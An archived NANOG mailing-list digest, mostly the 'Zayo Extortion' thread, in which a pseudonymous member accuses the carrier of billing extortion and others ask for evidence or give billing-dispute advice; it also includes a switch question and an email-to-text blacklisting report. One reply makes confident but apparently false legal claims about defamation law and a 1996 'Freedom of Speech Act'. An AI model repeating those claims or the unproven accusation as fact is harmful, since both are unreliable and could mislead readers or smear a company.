> > We have connected two nexus 3048 Switches and two l2 Switches as below > using vPC and LACP. > > We have not seen any issues apart from one of VOIP server connected to > Switch 1 has lost access to VOIP Server connected Switch 2 and vice versa. > > Where I am able to ping both from Global. Can you please let me know what > is went wrong here. > > > [image: Inline image 2] > -- Try and fail but never fail to try From nanog at ics-il.net Mon Aug 15 12:29:19 2016 From: nanog at ics-il.net (Mike Hammett) Date: Mon, 15 Aug 2016 07:29:19 -0500 (CDT) Subject: Zayo Extortion In-Reply-To: <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> Message-ID: <1161972786.328.1471264156770.JavaMail.mhammett@ThunderFuck> Try more facts and less emotion. ----- Mike Hammett Intelligent Computing Solutions Midwest Internet Exchange The Brothers WISP ----- Original Message ----- From: "HonorFirst Name Ethics via NANOG" To: nanog at nanog.org Sent: Saturday, August 13, 2016 11:50:46 AM Subject: Zayo Extortion Question to the NANOG community, Is anyone else being extorted by Zayo? Is Zayo threatening shutdown over bogus and fabricated charges? The purpose of this message to the group is twofold: 1) to share our experience being extorted by Zayo with the community and 2) to understand the depth and extent of Zayo's less than ethical behavior by getting feedback from the community. Abovenet was a great organization with quality service, reasonable prices and nice folks to work with. Since being acquired by Zayo we have seen a significant degradation of service quality and responsiveness which is not unusual from a provider, but Zayo has taken things to a level of low ethics that would make Tony Soprano proud. 
Most interestingly they seem to identify points where you are dependent on them and threaten a shut down unless you pay them some arbitrary amount. In our case we use multiple Zayo IP, Transport, and Colo Services -- they set their extortion amount at $128,000. A completely arbitrary and fabricated number. They put significant pressure threatening to shut us down by setting their lawyers on us. Our detailed contract breakdowns, invoice and payment spreadsheets, along with all other commonsense and professional efforts were simply disregarded. At one point their lawyers and accounting people had the nerve to say "our accounting system does not track invoice details -- it only shows the total amount due so your numbers mean nothing to us." All the while they relentlessly levied disconnect threats with short timelines such as: "if you don't pay us $128,000 by this Friday, we will shut your operation down." We have had anecdotal feedback that we are not alone in our experience and that there are many more like us. If you and your company have had a similar experience with Zayo, please share it with the group or if like us you are concerned about retaliation from Zayo, please respond privately. If the group shares their experiences the public shaming may drive Zayo to stop operating like mafia thugs. If the problem is as common as we suspect, it may warrant getting the Attorney General involved. In the mean time, I strongly urge anyone already in a relationship with Zayo or considering a relationship to make sure your are well diversified with other more ethical carriers. Otherwise please consider another organization to work with. In our case we were better of with Ransomeware, than Zayo as a vendor! 
Its cheaper and less damaging A Zayo victim and a NANOG Member From paras at protrafsolutions.com Mon Aug 15 14:13:46 2016 From: paras at protrafsolutions.com (Paras Jha) Date: Mon, 15 Aug 2016 10:13:46 -0400 Subject: Zayo Extortion In-Reply-To: <1161972786.328.1471264156770.JavaMail.mhammett@ThunderFuck> References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> <1161972786.328.1471264156770.JavaMail.mhammett@ThunderFuck> Message-ID: Yeah, I see a wall of text, but no real evidence to substantiate it. On Mon, Aug 15, 2016 at 8:29 AM, Mike Hammett wrote: > Try more facts and less emotion. > > > > ----- > Mike Hammett > Intelligent Computing Solutions > > Midwest Internet Exchange > > The Brothers WISP > > > ----- Original Message ----- > > From: "HonorFirst Name Ethics via NANOG" > To: nanog at nanog.org > Sent: Saturday, August 13, 2016 11:50:46 AM > Subject: Zayo Extortion > > Question to the NANOG community, Is anyone else being extorted by Zayo? Is > Zayo threatening shutdown over bogus and fabricated charges? > > The purpose of this message to the group is twofold: 1) to share our > experience being extorted by Zayo with the community and 2) to understand > the depth and extent of Zayo's less than ethical behavior by getting > feedback from the community. > > Abovenet was a great organization with quality service, reasonable prices > and nice folks to work with. Since being acquired by Zayo we have seen a > significant degradation of service quality and responsiveness which is not > unusual from a provider, but Zayo has taken things to a level of low ethics > that would make Tony Soprano proud. > Most interestingly they seem to identify points where you are dependent on > them and threaten a shut down unless you pay them some arbitrary amount. In > our case we use multiple Zayo IP, Transport, and Colo Services -- they set > their extortion amount at $128,000. 
A completely arbitrary and fabricated > number. They put significant pressure threatening to shut us down by > setting their lawyers on us. > Our detailed contract breakdowns, invoice and payment spreadsheets, along > with all other commonsense and professional efforts were simply > disregarded. At one point their lawyers and accounting people had the nerve > to say "our accounting system does not track invoice details -- it only > shows the total amount due so your numbers mean nothing to us." All the > while they relentlessly levied disconnect threats with short timelines such > as: "if you don't pay us $128,000 by this Friday, we will shut your > operation down." > We have had anecdotal feedback that we are not alone in our experience and > that there are many more like us. If you and your company have had a > similar experience with Zayo, please share it with the group or if like us > you are concerned about retaliation from Zayo, please respond privately. > > If the group shares their experiences the public shaming may drive Zayo to > stop operating like mafia thugs. If the problem is as common as we suspect, > it may warrant getting the Attorney General involved. > > In the mean time, I strongly urge anyone already in a relationship with > Zayo or considering a relationship to make sure your are well diversified > with other more ethical carriers. Otherwise please consider another > organization to work with. > In our case we were better of with Ransomeware, than Zayo as a vendor! 
Its > cheaper and less damaging > > A Zayo victim and a NANOG Member > -- Regards, Paras President ProTraf Solutions, LLC Enterprise DDoS Mitigation From cb.list6 at gmail.com Mon Aug 15 15:10:22 2016 From: cb.list6 at gmail.com (Ca By) Date: Mon, 15 Aug 2016 08:10:22 -0700 Subject: Zayo Extortion In-Reply-To: <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> Message-ID: Nope, have not seen any of this bad stuff you speak of. I can say that over the last few years i have done a ton business with Zayo and they are top flight in every respect. On Saturday, August 13, 2016, HonorFirst Name Ethics via NANOG < nanog at nanog.org> wrote: > Question to the NANOG community, Is anyone else being extorted by Zayo? > Is Zayo threatening shutdown over bogus and fabricated charges? > > The purpose of this message to the group is twofold: 1) to share our > experience being extorted by Zayo with the community and 2) to understand > the depth and extent of Zayo's less than ethical behavior by getting > feedback from the community. > > Abovenet was a great organization with quality service, reasonable prices > and nice folks to work with. Since being acquired by Zayo we have seen a > significant degradation of service quality and responsiveness which is not > unusual from a provider, but Zayo has taken things to a level of low ethics > that would make Tony Soprano proud. > Most interestingly they seem to identify points where you are dependent on > them and threaten a shut down unless you pay them some arbitrary amount. > In our case we use multiple Zayo IP, Transport, and Colo Services -- they > set their extortion amount at $128,000. A completely arbitrary and > fabricated number. They put significant pressure threatening to shut us > down by setting their lawyers on us. 
> Our detailed contract breakdowns, invoice and payment spreadsheets, along > with all other commonsense and professional efforts were simply > disregarded. At one point their lawyers and accounting people had the > nerve to say "our accounting system does not track invoice details -- it > only shows the total amount due so your numbers mean nothing to us." All > the while they relentlessly levied disconnect threats with short timelines > such as: "if you don't pay us $128,000 by this Friday, we will shut your > operation down." > We have had anecdotal feedback that we are not alone in our experience and > that there are many more like us. If you and your company have had a > similar experience with Zayo, please share it with the group or if like us > you are concerned about retaliation from Zayo, please respond privately. > > If the group shares their experiences the public shaming may drive Zayo > to stop operating like mafia thugs. If the problem is as common as we > suspect, it may warrant getting the Attorney General involved. > > In the mean time, I strongly urge anyone already in a relationship with > Zayo or considering a relationship to make sure your are well diversified > with other more ethical carriers. Otherwise please consider another > organization to work with. > In our case we were better of with Ransomeware, than Zayo as a vendor! > Its cheaper and less damaging > > A Zayo victim and a NANOG Member > From jlewis at lewis.org Mon Aug 15 15:16:26 2016 From: jlewis at lewis.org (Jon Lewis) Date: Mon, 15 Aug 2016 11:16:26 -0400 (EDT) Subject: Zayo Extortion In-Reply-To: References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> Message-ID: Obvious first question would be, have you fallen behind paying your bill? Most service providers will threaten to disrupt your service if you don't pay for the services they provide. 
I would expect you're months behind paying for service before they say: "if you don't pay us $128,000 by this Friday, we will shut [you down]." > On Saturday, August 13, 2016, HonorFirst Name Ethics via NANOG < > nanog at nanog.org> wrote: > >> Question to the NANOG community, Is anyone else being extorted by Zayo? >> Is Zayo threatening shutdown over bogus and fabricated charges? >> >> The purpose of this message to the group is twofold: 1) to share our >> experience being extorted by Zayo with the community and 2) to understand >> the depth and extent of Zayo's less than ethical behavior by getting >> feedback from the community. >> >> Abovenet was a great organization with quality service, reasonable prices >> and nice folks to work with. Since being acquired by Zayo we have seen a >> significant degradation of service quality and responsiveness which is not >> unusual from a provider, but Zayo has taken things to a level of low ethics >> that would make Tony Soprano proud. >> Most interestingly they seem to identify points where you are dependent on >> them and threaten a shut down unless you pay them some arbitrary amount. >> In our case we use multiple Zayo IP, Transport, and Colo Services -- they >> set their extortion amount at $128,000. A completely arbitrary and >> fabricated number. They put significant pressure threatening to shut us >> down by setting their lawyers on us. >> Our detailed contract breakdowns, invoice and payment spreadsheets, along >> with all other commonsense and professional efforts were simply >> disregarded. At one point their lawyers and accounting people had the >> nerve to say "our accounting system does not track invoice details -- it >> only shows the total amount due so your numbers mean nothing to us." All >> the while they relentlessly levied disconnect threats with short timelines >> such as: "if you don't pay us $128,000 by this Friday, we will shut your >> operation down." 
>> We have had anecdotal feedback that we are not alone in our experience and >> that there are many more like us. If you and your company have had a >> similar experience with Zayo, please share it with the group or if like us >> you are concerned about retaliation from Zayo, please respond privately. >> >> If the group shares their experiences the public shaming may drive Zayo >> to stop operating like mafia thugs. If the problem is as common as we >> suspect, it may warrant getting the Attorney General involved. >> >> In the mean time, I strongly urge anyone already in a relationship with >> Zayo or considering a relationship to make sure your are well diversified >> with other more ethical carriers. Otherwise please consider another >> organization to work with. >> In our case we were better of with Ransomeware, than Zayo as a vendor! >> Its cheaper and less damaging >> >> A Zayo victim and a NANOG Member >> > ---------------------------------------------------------------------- Jon Lewis, MCP :) | I route | therefore you are _________ http://www.lewis.org/~jlewis/pgp for PGP public key_________ From Valdis.Kletnieks at vt.edu Mon Aug 15 15:41:28 2016 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Mon, 15 Aug 2016 11:41:28 -0400 Subject: Zayo Extortion In-Reply-To: References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> Message-ID: <13841.1471275688@turing-police.cc.vt.edu> On Mon, 15 Aug 2016 11:16:26 -0400, Jon Lewis said: > Obvious first question would be, have you fallen behind paying your bill? And if you're in fact up-to-date, make sure you have *proof* of same. It's not unheard of for providers to mis-credit your payments and then think you're behind. Usually showing them proof that funds were transferred to the provider, and it's *their* problem to fix their accounting system, is sufficient to make them change their tune *really* fast... 
From savage at savage.za.org Mon Aug 15 15:49:06 2016 From: savage at savage.za.org (Chris Knipe) Date: Mon, 15 Aug 2016 17:49:06 +0200 Subject: Zayo Extortion In-Reply-To: <13841.1471275688@turing-police.cc.vt.edu> References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> <13841.1471275688@turing-police.cc.vt.edu> Message-ID: On Mon, Aug 15, 2016 at 5:41 PM, wrote: > On Mon, 15 Aug 2016 11:16:26 -0400, Jon Lewis said: > > Obvious first question would be, have you fallen behind paying your bill? > > And if you're in fact up-to-date, make sure you have *proof* of same. It's > not unheard of for providers to mis-credit your payments and then think > you're > behind. Usually showing them proof that funds were transferred to the > provider, and it's *their* problem to fix their accounting system, is > sufficient to make them change their tune *really* fast... > Although a company that can't manage their book keeping properly, is IMHO enough reason to not use them... :-) -- Regards, Chris Knipe From mysidia at gmail.com Mon Aug 15 18:00:06 2016 From: mysidia at gmail.com (Jimmy Hess) Date: Mon, 15 Aug 2016 13:00:06 -0500 Subject: Zayo Extortion In-Reply-To: <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> Message-ID: On Sat, Aug 13, 2016 at 11:50 AM, HonorFirst Name Ethics via NANOG wrote: > to say "our accounting system does not track invoice details -- it only shows the total amount due so your numbers mean nothing to us."
> All the while they relentlessly levied disconnect threats with short timelines such as: "if you don't pay us $128,000 by this Friday, > we will shut your operation down." [...] >At one point their lawyers and accounting people had the nerve to say "our accounting system does not track invoice details Are you talking with your SP's lawyers without a legal team of your own present and advising you? I think one of the first things they should tell you is not to discuss pending disputes in public. Time to get a consultation with your own Lawyers to assist with billing dispute resolution, ASAP. Provided there is a reasonable agreement in place: I think You ought to be able to at least temporarily delay your SP from turning off services, while you work out your billing dispute. The service provider could be subject to liability by turning off services which you have not agreed to disconnect. Your lawyers should be able to refute a SP's claim about their records system not tracking the actual amounts due under specific agreements causing the conclusion that the output from the record system is inscrutable and infallible. -- -JH From fw at deneb.enyo.de Mon Aug 15 18:09:39 2016 From: fw at deneb.enyo.de (Florian Weimer) Date: Mon, 15 Aug 2016 20:09:39 +0200 Subject: Zayo Extortion In-Reply-To: (Chris Knipe's message of "Mon, 15 Aug 2016 17:49:06 +0200") References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> <13841.1471275688@turing-police.cc.vt.edu> Message-ID: <87y43xaopo.fsf@mid.deneb.enyo.de> * Chris Knipe: > Although a company that can't manage their book keeping properly, is IMHO > enough reason to not use them... :-) There used to be a saying that you could choose between carriers with functional billing and carriers with a functional network.
From SNaslund at medline.com Mon Aug 15 18:19:19 2016 From: SNaslund at medline.com (Naslund, Steve) Date: Mon, 15 Aug 2016 18:19:19 +0000 Subject: Zayo Extortion In-Reply-To: <87y43xaopo.fsf@mid.deneb.enyo.de> References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> <13841.1471275688@turing-police.cc.vt.edu> <87y43xaopo.fsf@mid.deneb.enyo.de> Message-ID: <9578293AE169674F9A048B2BC9A081B401E6685ACF@MUNPRDMBXA1.medline.com> That is pretty close to my experience. I would say nearly all carriers have billing nightmares and some of them have networks that work well. Best carrier for billing is a bit like asking for the best ice skater in hell. Steven Naslund Chicago IL -----Original Message----- From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Florian Weimer Sent: Monday, August 15, 2016 1:10 PM To: Chris Knipe Cc: nanog at nanog.org Subject: Re: Zayo Extortion * Chris Knipe: > Although a company that can't manage their book keeping properly, is > IMHO enough reason to not use them... :-) There used to be a saying that you could choose between carriers with functional billing and carriers with a functional network. From bill at herrin.us Mon Aug 15 18:19:03 2016 From: bill at herrin.us (William Herrin) Date: Mon, 15 Aug 2016 14:19:03 -0400 Subject: Zayo Extortion In-Reply-To: <1161972786.328.1471264156770.JavaMail.mhammett@ThunderFuck> References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> <1161972786.328.1471264156770.JavaMail.mhammett@ThunderFuck> Message-ID: On Mon, Aug 15, 2016 at 8:29 AM, Mike Hammett wrote: > Try more facts and less emotion. +1 > From: "HonorFirst Name Ethics via NANOG" > they relentlessly levied disconnect threats with short timelines > such as: "if you don't pay us $128,000 by this Friday, we will > shut your operation down."
Short timeline or short by the time you became aware of it? It's not unusual in this business for POCs to fall out of date where an SP can't communicate a problem to you, or for billing and technical POCs at an organization to not communicate with each other. If this is a case of the threats finally got serious enough that the other guy figured he should mention them to you, that doesn't really qualify as a short timeline. As far as raising the rent goes... that's frankly an industry-wide problem. The SP runs 12 different contracts with you with 12 different contract periods for interrelated services that from your perspective are all-or-none. Your contract period on one comes to a close and when you ask for the renewal price you get sticker-shock. It's even more frustrating when it's all-or-none interrelated services from three or four vendors and only one decides to raise the rent. Live and learn and in the future do the extra legwork to make your service contracts at any single location co-terminating. Regards, Bill Herrin -- William Herrin ................ herrin at dirtside.com bill at herrin.us Owner, Dirtside Systems ......... Web: From SNaslund at medline.com Mon Aug 15 18:23:02 2016 From: SNaslund at medline.com (Naslund, Steve) Date: Mon, 15 Aug 2016 18:23:02 +0000 Subject: Zayo Extortion In-Reply-To: References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> Message-ID: <9578293AE169674F9A048B2BC9A081B401E6685AE5@MUNPRDMBXA1.medline.com> Exactly, It is unlikely they will ever be able to collect on a debt they do not have documentation to support but that does not stop them from disconnecting your service whenever they want. You might have legal recourse to go after them if they disconnect you but it won't be fast and it won't give you immediate connectivity. Talk to your lawyers and in the meantime I would be shopping some alternative service for when things get nasty.
Steven Naslund Chicago IL -----Original Message----- From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Jimmy Hess Sent: Monday, August 15, 2016 1:00 PM To: HonorFirst Name Ethics Cc: nanog at nanog.org Subject: Re: Zayo Extortion On Sat, Aug 13, 2016 at 11:50 AM, HonorFirst Name Ethics via NANOG wrote: > to say "our accounting system does not track invoice details -- it only shows the total amount due so your numbers mean nothing to us." > All the while they relentlessly levied disconnect threats with short > timelines such as: "if you don't pay us $128,000 by this Friday, we will shut your operation down." [...] >At one point their lawyers and accounting people had the nerve to say >"our accounting system does not track invoice details Are you talking with your SP's lawyers without your a legal team of your own present and advising you? I think one of the first things they should tell you is not to discuss pending disputes in public. Time to get a consultation with your own Lawyers to assist with billing dispute resolution, ASAP. Provided there is a reasonable agreement in place: I think You ought to be able to at least temporarily delay your SP from turning off services, while you work out your billing dispute. The service provider could be subject to liability by turning off services which you have not agreed to disconnect. Your lawyers should be able to refute a SP's claim about their records system not tracking the actual amounts due under specific agreements causing the conclusion that the output from the record system is inscrutible and infallible. 
-- -JH From larrysheldon at cox.net Tue Aug 16 00:20:17 2016 From: larrysheldon at cox.net (Larry Sheldon) Date: Mon, 15 Aug 2016 19:20:17 -0500 Subject: Zayo Extortion In-Reply-To: <1161972786.328.1471264156770.JavaMail.mhammett@ThunderFuck> References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> <1161972786.328.1471264156770.JavaMail.mhammett@ThunderFuck> Message-ID: On 8/15/2016 07:29, Mike Hammett wrote: > Try more facts and less emotion. I remember a day when I was banned from NANOG of less emotion and lots more factual content. > ----- Original Message ----- > > From: "HonorFirst Name Ethics via NANOG" Red-flag line. [much snippage has occurred] > A Zayo victim and a NANOG Member [a little more would have been right] -- "Everybody is a genius. But if you judge a fish by its ability to climb a tree, it will live its whole life believing that it is stupid." --Albert Einstein From Larry's Cox account. From erich at gotfusion.net Mon Aug 15 14:19:01 2016 From: erich at gotfusion.net (Kaiser, Erich) Date: Mon, 15 Aug 2016 09:19:01 -0500 Subject: Zayo Extortion In-Reply-To: References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> <1161972786.328.1471264156770.JavaMail.mhammett@ThunderFuck> Message-ID: In response to the original email they do do this I have experienced it myself it is usually because of billing issues that they don't know how to resolve. It's complete BS worse than dealing with att. On Aug 15, 2016 9:14 AM, "Paras Jha" wrote: > Yeah, I see a wall of text, but no real evidence to substantiate it. > > On Mon, Aug 15, 2016 at 8:29 AM, Mike Hammett wrote: > > > Try more facts and less emotion. 
> > > > > > > > ----- > > Mike Hammett > > Intelligent Computing Solutions > > > > Midwest Internet Exchange > > > > The Brothers WISP > > > > > > ----- Original Message ----- > > > > From: "HonorFirst Name Ethics via NANOG" > > To: nanog at nanog.org > > Sent: Saturday, August 13, 2016 11:50:46 AM > > Subject: Zayo Extortion > > > > Question to the NANOG community, Is anyone else being extorted by Zayo? > Is > > Zayo threatening shutdown over bogus and fabricated charges? > > > > The purpose of this message to the group is twofold: 1) to share our > > experience being extorted by Zayo with the community and 2) to understand > > the depth and extent of Zayo's less than ethical behavior by getting > > feedback from the community. > > > > Abovenet was a great organization with quality service, reasonable prices > > and nice folks to work with. Since being acquired by Zayo we have seen a > > significant degradation of service quality and responsiveness which is > not > > unusual from a provider, but Zayo has taken things to a level of low > ethics > > that would make Tony Soprano proud. > > Most interestingly they seem to identify points where you are dependent > on > > them and threaten a shut down unless you pay them some arbitrary amount. > In > > our case we use multiple Zayo IP, Transport, and Colo Services -- they > set > > their extortion amount at $128,000. A completely arbitrary and fabricated > > number. They put significant pressure threatening to shut us down by > > setting their lawyers on us. > > Our detailed contract breakdowns, invoice and payment spreadsheets, along > > with all other commonsense and professional efforts were simply > > disregarded. At one point their lawyers and accounting people had the > nerve > > to say "our accounting system does not track invoice details -- it only > > shows the total amount due so your numbers mean nothing to us." 
All the > > while they relentlessly levied disconnect threats with short timelines > such > > as: "if you don't pay us $128,000 by this Friday, we will shut your > > operation down." > > We have had anecdotal feedback that we are not alone in our experience > and > > that there are many more like us. If you and your company have had a > > similar experience with Zayo, please share it with the group or if like > us > > you are concerned about retaliation from Zayo, please respond privately. > > > > If the group shares their experiences the public shaming may drive Zayo > to > > stop operating like mafia thugs. If the problem is as common as we > suspect, > > it may warrant getting the Attorney General involved. > > > > In the mean time, I strongly urge anyone already in a relationship with > > Zayo or considering a relationship to make sure your are well diversified > > with other more ethical carriers. Otherwise please consider another > > organization to work with. > > In our case we were better of with Ransomeware, than Zayo as a vendor! > Its > > cheaper and less damaging > > > > A Zayo victim and a NANOG Member > > > > > > -- > Regards, > Paras > > President > ProTraf Solutions, LLC > Enterprise DDoS Mitigation > From amitchell at isipp.com Tue Aug 16 14:45:29 2016 From: amitchell at isipp.com (Anne Mitchell) Date: Tue, 16 Aug 2016 08:45:29 -0600 Subject: Zayo Extortion In-Reply-To: References: Message-ID: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com> >> to say "our accounting system does not track invoice details -- it only shows the total amount due so your numbers mean nothing to us." >> All the while they relentlessly levied disconnect threats with short timelines such as: "if you don't pay us $128,000 by this Friday, >> we will shut your operation down." > [...] 
>> At one point their lawyers and accounting people had the nerve to say "our accounting system does not track invoice details > > Are you talking with your SP's lawyers without your a legal team of > your own present and advising you? > I think one of the first things they should tell you is not to discuss > pending disputes in public. Time to get > a consultation with your own Lawyers to assist with billing dispute > resolution, ASAP. Not to mention that accusing someone of a crime (extortion), in public (in this context I would argue that this is public, especially as the term 'community' was used in the allegation) is a pretty serious thing. Anne P. Mitchell, Attorney at Law Legislative Consultant CEO/President, SuretyMail Email Reputation Certification and Inbox Delivery Assistance http://www.SuretyMail.com/ http://www.SuretyMail.eu/ Available for consultations by special arrangement. Author: Section 6 of the CAN-SPAM Act of 2003 (the Federal anti-spam law) Member, California Bar Cyberspace Law Committee Member, Colorado Cybersecurity Consortium Member, Asilomar Microcomputer Workshop Committee Ret. Professor of Law, Lincoln Law School of San Jose Ret. Chair, Asilomar Microcomputer Workshop amitchell at isipp.com | @AnnePMitchell Facebook/AnnePMitchell | LinkedIn/in/annemitchell From niels=nanog at bakker.net Tue Aug 16 15:53:23 2016 From: niels=nanog at bakker.net (Niels Bakker) Date: Tue, 16 Aug 2016 17:53:23 +0200 Subject: Zayo Extortion In-Reply-To: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com> References: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com> Message-ID: <20160816155323.GF3955@excession.tpb.net> * amitchell at isipp.com (Anne Mitchell) [Tue 16 Aug 2016, 16:46 CEST]: [...] >Attorney at Law >Legislative Consultant An actual lawyer! Where were you in the CloudFlare booters thread, though? -- Niels. -- "It's amazing what people will do to get their name on the internet, which is odd, because all you really need is a Blogspot account." 
-- roy edroso, alicublog.blogspot.com From Valdis.Kletnieks at vt.edu Tue Aug 16 16:52:25 2016 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Tue, 16 Aug 2016 12:52:25 -0400 Subject: Zayo Extortion In-Reply-To: <20160816155323.GF3955@excession.tpb.net> References: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com> <20160816155323.GF3955@excession.tpb.net> Message-ID: <5529.1471366345@turing-police.cc.vt.edu> On Tue, 16 Aug 2016 17:53:23 +0200, Niels Bakker said: > An actual lawyer! Where were you in the CloudFlare booters thread, though? Keeping sensibly quiet, I think... :) From fkittred at gwi.net Tue Aug 16 16:38:59 2016 From: fkittred at gwi.net (Fletcher Kittredge) Date: Tue, 16 Aug 2016 12:38:59 -0400 Subject: Zayo Extortion In-Reply-To: <20160816155323.GF3955@excession.tpb.net> References: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com> <20160816155323.GF3955@excession.tpb.net> Message-ID: On Tue, Aug 16, 2016 at 11:53 AM, Niels Bakker wrote: > > An actual lawyer! Where were you in the CloudFlare booters thread, though? > Key legal skills are knowing when to stay out of fights and when to keep one's mouth shut (i.e. most of the time.) -- Fletcher Kittredge GWI 207-602-1134 www.gwi.net From mike-nanog at tiedyenetworks.com Tue Aug 16 21:44:06 2016 From: mike-nanog at tiedyenetworks.com (Mike) Date: Tue, 16 Aug 2016 14:44:06 -0700 Subject: Email to text - vtext.com blacklisting ip Message-ID: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com> Hi, I have a server that monitors my network and issues text messages if there are events of note that require human intervention.
There is some process filtering that ensures it also is not able to issue more than 1 alert maximum per 5 minutes, to ensure it doesn't flood pagers with messages all screaming the sky is falling when things are not going well. Recently however, this server is no longer able to deliver messages to vtext.com - it gets nothing but 554 errors: telnet 69.78.67.53 25 Trying 69.78.67.53... Connected to 69.78.67.53. Escape character is '^]'. 554 txslspamp10.vtext.com Connection closed by foreign host. Granted on some days during challenging times it can send 30 or 40 messages before we get to it and get it squelched / silenced, but it's otherwise reasonably well behaved IMHO and I don't think we are any heavy volume sender. So I am trying to figure out why it's blacklisted then and am rolling snake eyes. If anyone who is an admin for verizon or who has any insight to share I'd certainly appreciate it. Email to text is a critical function we depend on. Thank you. From josh at imaginenetworksllc.com Tue Aug 16 22:08:54 2016 From: josh at imaginenetworksllc.com (Josh Luthman) Date: Tue, 16 Aug 2016 18:08:54 -0400 Subject: Email to text - vtext.com blacklisting ip In-Reply-To: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com> References: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com> Message-ID: If it's critical I'd suggest a service than can depended on... Josh Luthman Office: 937-552-2340 Direct: 937-552-2343 1100 Wayne St Suite 1337 Troy, OH 45373 On Aug 16, 2016 5:45 PM, "Mike" wrote: > Hi, > > > I have a server that monitors my network and issues text messages if > there are events of note that require human intervention. There is some > process filtering that ensures it also is not able to issue more than 1 > alert maximum per 5 minutes, to ensure it doesn't flood pagers with > messages all screaming the sky is falling when things are not going well. 
> Recently however, this server is no longer able to deliver messages to > vtext.com - it gets nothing but 554 errors: > > > telnet 69.78.67.53 25 > Trying 69.78.67.53... > Connected to 69.78.67.53. > Escape character is '^]'. > 554 txslspamp10.vtext.com > Connection closed by foreign host. > > Granted on some days during challenging times it can send 30 or 40 > messages before we get to it and get it squelched / silenced, but it's > otherwise reasonably well behaved IMHO and I don't think we are any heavy > volume sender. So I am trying to figure out why it's blacklisted then and > am rolling snake eyes. If anyone who is an admin for verizon or who has > any insight to share I'd certainly appreciate it. Email to text is a > critical function we depend on. > > > Thank you. > > > From jhall at futuresouth.us Tue Aug 16 23:11:09 2016 From: jhall at futuresouth.us (Jonathan Hall) Date: Wed, 17 Aug 2016 01:11:09 +0200 Subject: Zayo Extortion In-Reply-To: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com> References: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com> Message-ID: <2803E274-0AFF-4AA5-B0D0-898457E34081@futuresouth.us> Excuse me for chiming in, here? But, if I'm not mistaken (don't worry, I'm not) - this doesn't count as "slander" in any way, shape or form. This mail thread is not any kind of valid FCC controlled or public communications device, as the internet was actually excluded from the public communications device list under the Freedom of Speech Act in? Was it, 1996? Which means, "slander" can't be called in this case. You could argue that it can, but you'd lose in court in the long run. If you're aiming for the defamation card? That's a very difficult one to prove. I'd counter the argument in a court room by asking the judge to prove the plaintiff is NOT an extortionist scum bag. It certainly works both ways. And either way, defamation requires some form of punitive damage be proven in order to actually win that case.
Are you saying that the company he is referencing has some way to claim and directly correlate a loss of income or potential loss of income, either present and/or future, due to the comment made on a mail group? I'd love to see that quantification on paper... None the less, regardless of what one accuses or says on the internet, the usage of the word "extortion" is quite open for interpretation with regards to context, and making such a statement does not qualify for slander nor defamation. He could feel he's being extorted, in which case exasperating his opinion publicly is no less legal than me telling you that I don't really think you're a good lawyer. Good luck trying to play that card in a courtroom. Short and simple: One could threaten to sue over it, and one could even try. Personally, I'd turn that court room in to a circus act if someone tried. I'd most likely get fined in contempt a few times, but at least even the judge will go home laughing. :) J > On 16 Aug 2016, at 16:45, Anne Mitchell wrote: > > >>> to say "our accounting system does not track invoice details -- it only shows the total amount due so your numbers mean nothing to us." >>> All the while they relentlessly levied disconnect threats with short timelines such as: "if you don't pay us $128,000 by this Friday, >>> we will shut your operation down." >> [...] >>> At one point their lawyers and accounting people had the nerve to say "our accounting system does not track invoice details >> >> Are you talking with your SP's lawyers without your a legal team of >> your own present and advising you? >> I think one of the first things they should tell you is not to discuss >> pending disputes in public. Time to get >> a consultation with your own Lawyers to assist with billing dispute >> resolution, ASAP.
